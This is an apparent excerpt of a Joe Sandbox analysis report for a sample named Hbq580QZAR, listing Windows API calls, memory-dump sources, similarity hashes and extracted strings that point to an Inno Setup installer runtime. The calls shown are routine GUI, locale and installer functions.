                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                            • String ID:
                                                                                            • API String ID: 862346643-0
                                                                                            • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                            • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                            • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                            • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                            • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                            • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveLong$Message
                                                                                            • String ID:
                                                                                            • API String ID: 2785966331-0
                                                                                            • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                            • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                            • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                            • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042948A
                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 1583807278-0
                                                                                            • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                            • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                            • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                            • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0041DE27
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                            • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                            • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                            • String ID:
                                                                                            • API String ID: 225703358-0
                                                                                            • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                            • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                            • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                            • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                            • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$Load
                                                                                            • String ID: $ $Internal error: Item already expanding
                                                                                            • API String ID: 1675784387-1948079669
                                                                                            • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                            • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                            • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                            • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                            APIs
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringWrite
                                                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                            • API String ID: 390214022-3304407042
                                                                                            • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                            • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                            • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                            • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                            APIs
                                                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                            • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                            • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassInfoLongMessageSendWindow
                                                                                            • String ID: COMBOBOX$Inno Setup: Language
                                                                                            • API String ID: 3391662889-4234151509
                                                                                            • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                            • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                            • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                            • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                              • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                              • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                            • API String ID: 1044490935-665933166
                                                                                            • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                            • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                            • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                            • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                              • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                              • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                            • String ID: ,$?
                                                                                            • API String ID: 2359071979-2308483597
                                                                                            • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                            • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                            • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                            • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                            APIs
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                            • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                            • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                            • String ID:
                                                                                            • API String ID: 1030595962-0
                                                                                            • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                            • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                            • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                            • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                            APIs
                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                            • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                            • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                            • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                            • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                            • String ID:
                                                                                            • API String ID: 2222416421-0
                                                                                            • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                            • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                            • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                            • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                              • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                              • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                              • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                            • TranslateMessage.USER32(?), ref: 004573B3
                                                                                            • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                            • String ID: [Paused]
                                                                                            • API String ID: 1007367021-4230553315
                                                                                            • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                            • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                            • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                            • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                            APIs
                                                                                            • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$LoadSleep
                                                                                            • String ID: CheckPassword
                                                                                            • API String ID: 4023313301-1302249611
                                                                                            • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                            • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                            • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                            • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                            APIs
                                                                                              • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                              • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                              • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                            • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                            • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                            Strings
                                                                                            • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                            • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                            • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                            • API String ID: 613034392-3771334282
                                                                                            • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                            • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                            • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                            • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                            Strings
                                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                            • CreateAssemblyCache, xrefs: 00459836
                                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                            • Fusion.dll, xrefs: 004597DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                            • API String ID: 190572456-3990135632
                                                                                            • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                            • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                            • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                            • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                            APIs
